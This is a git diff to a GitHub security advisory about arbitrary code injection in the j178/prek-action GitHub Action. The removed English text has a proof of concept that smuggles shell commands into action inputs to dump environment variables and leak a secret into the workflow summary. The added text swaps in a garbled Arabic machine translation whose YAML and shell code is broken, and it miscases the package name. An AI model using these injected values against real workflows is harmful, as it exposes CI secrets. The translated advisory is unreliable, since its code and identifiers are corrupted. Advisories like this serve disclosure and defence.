diff --git a/advisories/github-reviewed/2025/09/GHSA-pwf7-47c3-mfhx/GHSA-pwf7-47c3-mfhx.json b/advisories/github-reviewed/2025/09/GHSA-pwf7-47c3-mfhx/GHSA-pwf7-47c3-mfhx.json index 73028a865a47b..4ebea413994f0 100644 --- a/advisories/github-reviewed/2025/09/GHSA-pwf7-47c3-mfhx/GHSA-pwf7-47c3-mfhx.json +++ b/advisories/github-reviewed/2025/09/GHSA-pwf7-47c3-mfhx/GHSA-pwf7-47c3-mfhx.json @@ -1,11 +1,11 @@ { "schema_version": "1.4.0", "id": "GHSA-pwf7-47c3-mfhx", - "modified": "2025-09-29T17:51:19Z", + "modified": "2025-09-29T17:51:20Z", "published": "2025-09-29T17:51:19Z", "aliases": [], - "summary": "j178/prek-action vulnerable to arbitrary code injection in composite action", - "details": "### Summary\nThere are three potential attacks of arbitrary code injection vulnerability in the composite action at _action.yml_.\n\n### Details\nThe GitHub Action variables `inputs.prek-version`, `inputs.extra_args`, and `inputs.extra-args` can be used to execute arbitrary code in the context of the action.\n\n### PoC\n```yaml\n- uses: j178/prek-action@v1.0.5\n with:\n prek-version: $(printenv >> $GITHUB_STEP_SUMMARY && echo \"0.2.2\")\n extra_args: '&& echo \"MY_SECRET with a character is: ${MY_SECRET:0:1}a${MY_SECRET:1}\" >> $GITHUB_STEP_SUMMARY && echo \"\"'\n env:\n MY_SECRET: ${{ secrets.MY_SECRET }}\n```\n\nThe previous example will print all the environment variables, and it will expose `MY_SECRET` environment variable value to the summary of the workflow. An attacker could potentially use this vector to compromise the security of the target repository, even passing unnotice because the action will run normally.\n\n### Impact\nCritical, CWE-94", + "summary": "J178 / Prek-action عرضة لحقن التعليمات البرمجية التعسفية في العمل المركب.", + "details": "### ملخص\nهناك ثلاث هجمات محتملة لضعف حقن التعليمات البرمجية التعسفية في العمل المركب على _action.yml_. ### التفاصيل\nيمكن استخدام متغيرات GitHub Action \"inputs.prek-version\" و \"inputs.extra_args\" و \"inputs.extra-args\" لتنفيذ التعليمات البرمجية التعسفية في سياق الإجراء. ### PoC\n\"يامل.\n- يستخدم: j178/prek-action@v1.0.5\nمع:\nنسخة ما قبل الإنطلاق: $ (printenv >> $GITHUB_STEP_SUMMARY & & Echo \"0.2.2\") extra_args: '& echo \"MY_SECRET مع حرف: ${MY_SECRET:0:1}a${MY_SECRET:1}\" >> $GITHUB_STEP_SUMMARY & Echo \"\" ENV:\nMY_SECRET: ${{ أسرار. My_Secret }}\n\"'\n\nسيقوم المثال السابق بطباعة جميع متغيرات البيئة، وسيعرض قيمة متغير البيئة \"MY_SECRET\" لملخص سير العمل. يمكن للمهاجم استخدام هذا المتجه للمساس بأمن مستودع الهدف، حتى أنه يمر دون إشعار لأن الإجراء سيعمل بشكل طبيعي. ### تأثير\nحرج، CWE-94 ", "severity": [ { "type": "CVSS_V3", @@ -16,7 +16,7 @@ { "package": { "ecosystem": "GitHub Actions", - "name": "j178/prek-action" + "name": "J178/Prek-action" }, "ranges": [ {